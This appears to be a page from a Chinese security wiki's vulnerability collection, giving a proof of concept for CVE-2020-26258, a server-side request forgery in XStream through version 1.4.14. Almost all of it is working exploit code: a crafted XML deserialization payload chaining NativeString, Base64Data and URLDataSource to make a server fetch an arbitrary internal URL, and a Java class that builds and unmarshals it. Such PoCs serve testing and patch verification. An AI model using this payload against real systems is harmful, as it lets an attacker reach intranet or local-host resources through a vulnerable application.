menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right CVE-2020-26258 XStream SSRF.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    CVE-2020-26258 XStream SSRF.md
    2.21 KB / 2021-05-21 09:14:38
        # CVE-2020-26258 XStream SSRF
    
    PoC:
    
    
    ```
    <map>
      <entry>
        <jdk.nashorn.internal.objects.NativeString>
          <flags>0</flags>
          <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
            <dataHandler>
              <dataSource class='javax.activation.URLDataSource'>
                <url>http://localhost:8080/internal/:</url>
              </dataSource>
              <transferFlavors/>
            </dataHandler>
            <dataLen>0</dataLen>
          </value>
        </jdk.nashorn.internal.objects.NativeString>
        <string>test</string>
      </entry>
    </map>
    
    XStream xstream = new XStream();
    xstream.fromXML(xml);
    ```
    
    **CVE_2020_26258.java**
    
    
    ```java
    import com.thoughtworks.xstream.XStream;
    
    /*
    CVE-2020-26258: A Server-Side Forgery Request can be activated unmarshalling
    with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host.
    
    All versions until and including version 1.4.14
    
    https://x-stream.github.io/CVE-2020-26258.html
    
    Security framework of XStream not explicitly initialized, using predefined black list on your own risk.
    
    */
    
    
    public class CVE_2020_26258 {
        public static void main(String[] args) {
            String ssrf_xml = "<map>\n" +
                    "  <entry>\n" +
                    "    <jdk.nashorn.internal.objects.NativeString>\n" +
                    "      <flags>0</flags>\n" +
                    "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
                    "        <dataHandler>\n" +
                    "          <dataSource class='javax.activation.URLDataSource'>\n" +
                    "            <url>http://localhost:8989/internal/:</url>\n" +
                    "          </dataSource>\n" +
                    "          <transferFlavors/>\n" +
                    "        </dataHandler>\n" +
                    "        <dataLen>0</dataLen>\n" +
                    "      </value>\n" +
                    "    </jdk.nashorn.internal.objects.NativeString>\n" +
                    "    <string>test</string>\n" +
                    "  </entry>\n" +
                    "</map>";
    
            XStream xstream = new XStream();
            xstream.fromXML(ssrf_xml);
    
        }
    }
    ```
    
    ref:
    
    https://raw.githubusercontent.com/jas502n/CVE-2020-26259/main/CVE_2020_26258.java
    
    links
    file_download